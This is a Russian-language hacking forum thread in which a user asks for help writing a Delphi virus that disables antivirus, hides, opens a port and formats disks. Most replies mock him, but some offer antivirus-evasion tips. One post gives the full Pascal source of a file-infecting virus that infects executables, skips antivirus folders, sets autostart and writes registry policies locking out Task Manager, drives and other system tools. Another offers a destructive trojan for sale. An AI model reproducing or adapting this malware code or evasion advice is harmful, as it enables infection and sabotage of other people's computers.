Я бы хотел написать вирус на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт , ну и конечно небыл видим негде. ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска! зарание благодерен
† Flаmmen †, 11.09.2007 - 18:03
... а еще код вертикального взлета и выхода в открытый космос. Просто так вирусами никто делиться не будет и их написание — это целое искусство. А то если каждый ......пользователь будет писать вирусы, которые не видят антивирусы (!!!), то эра информационных технологий закончится.
de1ay, 11.09.2007 - 18:23
Давайте по порядку.
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
Я бы хотел написать вирус
Есть ли у тебя знания в области программирования как таковые?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
на Delphi
Да-а-а... Писать вирусы на дельфи. Прикидываешь размер файла?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
чтобы вир выбивал антивир (доктор веб или каспер)
Антивирус ты так просто не вырубишь, он сразу затрубит об этом пользователю или скромно промолчит, но вырубить свой процесс не даст. К тому же, все антивирусы работают в нулевом кольце, а твоя софтина туда вообще вряд ли пробьётся...
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
открывал какой небудь порт, ну и конечно небыл видим негде ... код перезагрузки и дальнейшнго форматирования диска!
Win-api учи и будет счастье... Подводя итог хочу спросить: Не передумал?
Цитата | Quote
Просто так вирусами никто делиться не будет и их написание — это целое искусство.
Есть в интернете сорсы троянов на дельфи...
ZaHack, 11.09.2007 - 22:50
Цитата | Quote(delay(0) @ 11.09.2007 - 19:23)
Есть в интернете сорсы троянов на дельфи...
Если эти программы-шутки можно назвать троянами. Самое юзабельное, что видел это "Боевой конь за 10 минут" от Михаила Фленова. Но это никак нельзя назвать полноценным трояном, так подкол ламера...
Цитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
Так, ну про вертикальный взлет тебе уже сказали, могу предложить еще код вызова Сотоны и выхода в Астрал.
Цитата | Quote
Есть ли у тебя знания в области программирования как таковые?
А ты сам как думаешь?
-=$eReG@=-, 12.09.2007 - 23:29
Цитата | Quote
Я бы хотел написать вирус на Delphi
сразу видно - матёрый хакер!
Цитата | Quote
я бы хотел чтобы вир выбивал антивир
ну, а кто ж не хотел бы
Цитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска! зарание благодерен
кого же это ты так невзлюбил?
Цитата | Quote
Win-api учи и будет счастье...
полностью поддерживаю зы: хочешь написать хороший вирус - учи лучше assembler и грОматЕку И да поможет тебе великий Ктулху.
kukkk, 11.10.2007 - 22:16
Антивир в принципе незачем вырубать))) Замути просто форму без внешней таблички с размером формы 1*1. Получицца активное приложение или убери его в трей каким-нибудь знакомым значком. каспер клюнет 100%. Я свои вирусы и вообще программы(у меня нет ни одной не хак бугага) пишу по принципу создания подобия самой безобидной программки))) Конечно если у тебя будет прописано отформатировать с то все антивиры завопят,а вот если прога получит список файлов,потом удалит 1,потом 2-й))) Никакого подозрения. Все легально.=> Каспер молчит. Исчи обходные пути. Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал. А что? Комп выключается по кнопке,только панда падло запалил это((
de1ay, 11.10.2007 - 22:29
kukkk, а то, что антивирь ставит хуки, тебе не о чем не говорит?
yah, 11.10.2007 - 22:31
Цитата | Quote(kukkk @ 11.10.2007 - 22:19)
Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал.
Вот это кстати похвально. Не всегда все сводится к перелезанию ring3->ring0. Для написания более менее рабочего вируса со всеми необходимыми функция вполне достаточно winapi. Главное грамотно продумать алгоритм. Ну а если уж хочется полной власти, то милости просим в ring0. Но там уже будет свой набор API.
ser_gaik88, 16.10.2007 - 21:01
Если руки не кривые в дельфине вир можно написать на 60-80 кб.Причём вполне полноценный!!А для тех кто срёт на обьём файлов из делфи,скажу что они просто не умеют юзать конпилы да ваще делфи херовато знают!!!Обычный инпутный ехе на 600кб при желании делается 60кб.
snike, 2.12.2007 - 15:59
Ну коль есть желание у тебя, попробуй для начала в "этом" разобраться . при желании можешь модифицировать.
Code
{$M 65520,0,0} Program Virus_DOS_HLLP_GVDG; USES DOS; Const VirSize=5982; Metka='by SN!KE=))'; MSize=length(Metka); type Bufer=array[1..VirSize] of Char; VAR Victim : integer; Procedure BeginEnd(i : integer); var n :integer; Begin case i of 0..10000: n:=0; 10001..20000: n:=i; 20001..30000: n:=random(1000) else begin n:=0; n:=random(65535); n:=i end; end; End; Function IntToStr(I : integer) : String; Var S : String [5]; Begin Str(I, S); IntToStr:=S; End; Procedure Musor; var fch : file of char; rch : char; ch : char; st : string; i : integer; ii : integer; iii : integer; begin randomize; BeginEnd(-1894); for i:=1 to random(10) do begin st:=''; for ii:=1 to random(5)+3 do begin rch:=chr(ord(random(26)+65)); st:=st+rch; end; Assign(fch,st+'.'+chr(ord(random(26)+65))+ +chr(ord(random(26)+65))+chr(ord(random(26)+65))); Rewrite(fch); for iii:=1 to random(1000) do begin ch:=chr(ord(random(256))); write(fch,ch); end; close(fch); end; end; Procedure AutoRun; VAR f : file; txt : text; i : integer; st1 : string; st2 : string; Begin st1:=GetEnv('SystemRoot')+'\'+'AVTORUN'+'.EXE'; for i:=1 to length(st1) do begin if st1[i]='\' then st2:=st2+'\'+st1[i] else st2:=st2+st1[i] end; Assign(f,st1); {$i-} Reset(f); Close(f); {$i+} if IOResult<>0 then Begin Assign(txt,'REG'); Rewrite(txt); Writeln(txt,'Windows Registry Editor Version 5.00'); Writeln(txt,'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]'); Writeln(txt,'"AVTORUN"="'+st2+'"'); Close(txt); Exec(GetEnv('Comspec'),'/c REG IMPORT REG'); Exec(GetEnv('Comspec'),'/c DEL REG'); Exec(GetEnv('Comspec'),'/c copy '+paramstr(0)+' '+st1); Exec(GetEnv('Comspec'),'/c cls'); End; BeginEnd(19573); End; procedure Shifr(var Buf : Bufer; key : integer); var k : integer; begin for k:=1 to Sizeof(Buf) do Buf[k]:=chr(ord(Buf[k]) xor key); end; procedure Infect(path,name:string); var FromF : file; ToF : file; BufVir : Bufer; NumRead : Word; txt : text; i : integer; k : integer; Key : integer; begin Assign(txt,path+name); append(txt); write(txt,Metka); BeginEnd(-2253); i:=0; k:=random(256); repeat inc(i); write(txt,chr(random(256))); BeginEnd(-1139); until i>k; Close(txt); BeginEnd(18190); Assign(ToF,path+name); reset(ToF,1); Key:=FileSize(ToF) mod 256; BeginEnd(19974); BlockRead(ToF,BufVir,SizeOf(BufVir), NumRead); Shifr(BufVir,Key); seek(ToF,filesize(ToF)); BlockWrite(ToF,BufVir,NumRead); Assign(FromF,paramstr(0)); reset(FromF,1); BlockRead(FromF,BufVir,SizeOf(BufVir), NumRead); seek(ToF,0); BlockWrite(ToF,BufVir,NumRead); Close(ToF); Close(FromF); end; procedure Find(dir:pathstr); var sr : searchrec; f : file; Buf : array[1..4] of Char; begin findfirst(dir+'*.exe',39,sr); if (pos('SYSTEM',dir)=0) and (pos('DRWEB', dir)=0) and (pos('KASPER',dir)=0) and (pos('PANDA', dir)=0) and (pos('NORTON',dir)=0) and (pos('COMMON',dir)=0) and (pos('DOCUM', dir)=0) and (pos('GVDG', dir)=0) then while doserror=0 do if Victim<13 then begin Assign(f,dir+sr.name); setfattr(f,0); {$i-}reset(f,1); Close(f);{$i+} IF ioresult=0 then Begin Assign(f,dir+sr.name); reset(f,1); BeginEnd(4089); if FileSize(f)>1000 then Begin seek(f,85); blockread(f,Buf,4); Close(f); if Buf<>'GVDG' then begin inc(Victim); BeginEnd(2908); Infect(dir,sr.name); end; end else Close(f); end; findnext(sr); BeginEnd(-2668); end else exit; end; procedure InRun(Run : integer); var f : file; txt : text; BufVir : Bufer; NumRead : Word; k : integer; z : char; Key : integer; i : longint; Buf : array[1..MSize]of char; begin if Run=1 then begin Musor; Assign(txt,getenv('TMP')+'reg'); rewrite(txt); writeln(txt,'Windows Registry Editor Version 5.00'); write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); writeln(txt,'Windows\CurrentVersion\Policies\Explorer]'); writeln(txt,'"DisableLocalMachineRun"=dword:00000001'); writeln(txt,'"NoFileMenu"=dword:00000001'); BeginEnd(14641); writeln(txt,'"NoControlPanel"=dword:00000001'); writeln(txt,'"NoDrives"=dword:3ffffff'); writeln(txt,'"NoViewOnDrive"=dword:3ffffff'); writeln(txt,'"NoClose"=dword:00000001'); BeginEnd(6546); writeln(txt,'"NoChangeStartMenu"=dword:00000001'); writeln(txt,'"NoViewContextMenu"=dword:00000001'); writeln(txt,'"NoRun"=dword:00000001'); writeln(txt,'"NoFind"=dword:00000001'); writeln(txt,'"NoDesktop"=dword:00000001'); write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); BeginEnd(-1088); writeln(txt,'Windows\CurrentVersion\Policies\System]'); writeln(txt,'"DisableTaskMgr"=dword:00000001'); BeginEnd(6313); writeln(txt,'"DisableRegistryTools"=dword:00000001'); writeln(txt,'"NoDispCPL"=dword:00000001'); Close(txt); exec(getenv('comspec'),'/c reg import '+getenv('TMP')+'reg'); exec(getenv('comspec'),'/c cls'); BeginEnd(-1408); erase(txt); exec(getenv('Comspec'),'/c cmd /c time '+IntToStr(random(24))+':'+IntToStr(random(60))+':00,00'); exec(getenv('Comspec'),'/c cmd /c rundll32 user32, SwapMouseButton'); writeln('14/88'); end; Assign(f,paramstr(0)); reset(f,1); Key:=(FileSize(f)-VirSize) mod 256; seek(f,filesize(f)-VirSize); BlockRead(f,BufVir,SizeOf(BufVir), NumRead); if filesize(f)=VirSize then Begin Close(f); Erase(f); Halt(0); end else Shifr(BufVir,Key); seek(f,0); BlockWrite(f,BufVir,NumRead); i:=filesize(f)-VirSize-256-MSize; BeginEnd(11632); while true do begin seek(f,i); blockread(f,Buf,MSize); if Buf=Metka then begin seek(f,i); truncate(f); BeginEnd(23603); break; end; inc(i); end; Close(f); if Run=1 then exec(Paramstr(0),''); end; Procedure Nucleus; var f : file; begin Assign(f,paramstr(0)); SetFAttr(f,0); if Paramstr(1)='KILL' then begin InRun(0); Halt(0); end; AutoRun; Find(''); InRun(1); end; begin Randomize; BeginEnd(5352); Nucleus; end.
ZaHack, 2.12.2007 - 17:59
snike, а это что еще за гениальное произведение программистской мысли? Судя по процедуре "Find" тут же даже, так сказать поражение антивирусов реализовано очень прозорливо и на высочайшем уровне.
snike, 3.12.2007 - 19:30
Слушай, я бы на твоем месте это "произведение" даже читать не стал=)) Оно написано для подобного рода топикстартеров. Ну, а если ты принял это за вирь - ты на100%ящий RAT-кодер=))
x-foby, 4.12.2007 - 9:21
Цитата | Quote
при желании можешь модифицировать
ага, 'avtorun' на 'autorun' замени, к примеру..
de1ay, 4.12.2007 - 16:59
Накинулись на человека, он лишь привел пример.
snike, 4.12.2007 - 23:05
2delay(0). Спасибо тебе=)) Бог с ними, они показывают свои знаия делфей, которые в этом разделе вообще не должны упоменаться, не для дельфей раздел-то=))
Crab2, 31.07.2008 - 11:11
Цитата | Quote(DarkFire @ 11.09.2007 - 14:55)
Я бы хотел написать вирус на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт , ну и конечно небыл видим негде. ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска! зарание благодерен
Тупо убил фразой выбить антивир чувак по моему почти анреал а те для кого реал тупо не дадут сваи секреты
Termo, 18.08.2008 - 8:39
так времени то сколько прошло с момента опубликования ветки. думаю, уже научился чему-нить...
A l i k, 22.08.2008 - 10:35
Если не научился - продам исходник троя на родимом Делфи. Убивает ось нафик, антивирем не палится. Ось продолжает работать до первого ребута. Но при этом невозможно открыть НИЕДИНОГО файла, т.к. ось перестает их понимать. Ярлыки на рабочем столе так же становятся "темным лесом" для Винды.
de1ay, 22.08.2008 - 16:11
A l i k, это не троян, это "недопрограмма"...
A l i k, 22.08.2008 - 17:32
Согласен, мной была написана с перепугу в ламерские годы, когда я только знакомился с Делфи. Но фак есть фак - практически все, что просил аффтар, правда что без кода вызова сатаны и вертикального взлета.